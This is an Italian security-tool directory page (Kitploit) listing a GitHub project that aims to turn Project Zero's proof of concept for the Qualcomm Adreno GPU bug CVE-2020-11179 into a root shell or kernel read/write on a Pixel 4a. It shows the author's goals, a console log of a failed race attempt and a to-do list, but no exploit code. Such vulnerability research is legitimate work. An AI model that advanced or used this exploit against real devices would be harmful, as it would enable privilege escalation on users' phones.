Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/sparrow-labz/cve-2020-11179-adreno-qualcomm-gpu
Sicurezza AndroidEscalation di PrivilegiAnalisi delle VulnerabilitàExploitSicurezza MobileSicurezza HardwareBinary Exploitation
GitHubsparrow-labz/cve-2020-11179-adreno-qualcomm-gpu

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2020-11179-Adreno-Qualcomm-GPU

Sforzi di productizzazione del bug CVE-2020-11179 Adreno-Qualcomm-GPU, poc originale di Ben Hawkes di P0

Vedi Repository
73151 anno faNon ancora revisionato

Il mio lavoro indipendente a partire dal poc creato dal ricercatore P0 Ben Hawkes
Articolo originale: https://googleprojectzero.blogspot.com/2020/09/attacking-qualcomm-adreno-gpu.html

Il mio obiettivo è convertire il suo poc in C e continuare da dove si era interrotto, e trasformare il poc in una root shell,
o in un kernel r/w, e poi modificare il sistema in qualche modo per mostrare l'esecuzione del kernel.

  • molto probabilmente, l'offset di ttbr0 è diverso sul mio telefono di test
  • deve essere calcolato e sottoposto a debug per trovare l'offset

sunfish:/data/local/tmp $ ./adrenaline 0xfc45c000
main: rptr is passed as 0xfc45c000
main: rptr base is 0xfc45c000
adrenaline: starting adrenaline
parent: starting adrenaline_parent
child: starting adrenaline_child
parent: kick off the wait command, and follow it with the correct amount of alignment nops
parent: send a message to our child process, which will kick off a GPU context switch
parent: wait for confirmation that the context switch is in before proceeding
child: recive 6 inf pipe buff, and kick off a GPU context switch
child: let the parent process know that the context switch has been dispatched
parent: fill up the rest of ringbuffer 0
parent: signal the wait command to progress to scratch buffer rptr corruption
parent: scratch buffer rptr corrupt with AAAA
00000000 41 41 41 41 00 00 00 00 00 00 00 00 00 00 00 00 |AAAA............|
parent: exploit payload buffer
00000000 41 41 41 41 42 42 42 42 00 00 00 00 00 00 00 00 |AAAABBBB........|
adrenaline race lost: context id: (15), rptr_base: (0xfc45c000) -- try again \

dispositivo di test: pixel 4a
android 10 su build QD4A.2000317.027

DA FARE:

  • lavorare sul context switch e sulla race condition
  • per ottenere l'esecuzione di codice nel kernel
Scarica lo strumento